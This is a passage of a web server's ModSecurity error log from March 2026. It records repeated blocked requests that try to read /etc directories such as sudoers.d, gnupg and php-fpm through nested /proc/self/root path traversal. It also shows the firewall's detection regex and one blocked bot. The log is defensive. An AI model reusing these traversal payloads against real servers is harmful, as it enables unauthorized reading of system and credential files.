"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum4da6ubjKNq_cu4YOSgAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:55.292322 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:44692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum48df6f5d65gmYZRAVwAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:56.572921 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:44692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum5Mdf6f5d65gmYZRAWQAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:57.891185 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:44694] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum5eyqAr6etmhZHNowvQAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:34:17.818827 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.241.31:42510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum-eyqAr6etmhZHNow4QAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:34:21.353040 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.241.31:53034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum_RkFeYa1D6dYQnC6tQAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:34:22.634997 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:53042] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum_ta6ubjKNq_cu4YOXgAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:34:22.727419 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:44698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum_uyqAr6etmhZHNow5gAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:34:27.290967 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.243.128:35832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunAwbLMZ6AikZjR9UqogAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:34:28.641678 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:35848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunBPu8EFLIOrSqIptqrgAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:34:29.946064 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:45516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunBcdf6f5d65gmYZRAYQAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:34:31.055777 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.228.61:43902] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abunB8df6f5d65gmYZRAYgAAAtY"]
[Thu Mar 19 04:34:31.253066 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:45528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunB8df6f5d65gmYZRAYwAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:34:32.603120 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:45530] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunCMdf6f5d65gmYZRAZAAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:34:36.303783 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:53050] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunDPu8EFLIOrSqIptqwgAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:34:37.683106 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.241.31:50248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunDfu8EFLIOrSqIptqwwAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:34:40.039949 2026] [:error] [pid 27293:tid 140411632822016] [client 74.7.241.31:50260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunEP-YZRR_7pZ7nDJaOgAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:34:46.227673 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.241.31:50276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunFgbLMZ6AikZjR9UqqgAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:34:59.605708 2026] [:error] [pid 19093:tid 140411632822016] [client 74.7.241.31:55720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunI1_V7PWP6ixUYl6JRAAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:36:02.615319 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.241.31:37628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunYgkwaGbbGflqUZCCBQAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:36:04.447440 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.243.128:45544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunZBkFeYa1D6dYQnC7KAAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:36:08.355530 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.241.31:55970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunZ_-YZRR_7pZ7nDJaWwAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:36:09.939591 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:43810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunaeoXxyEfFpUF8f_d2QAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:36:11.308391 2026] [:error] [pid 27293:tid 140411733534464] [client 74.7.241.31:43478] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri 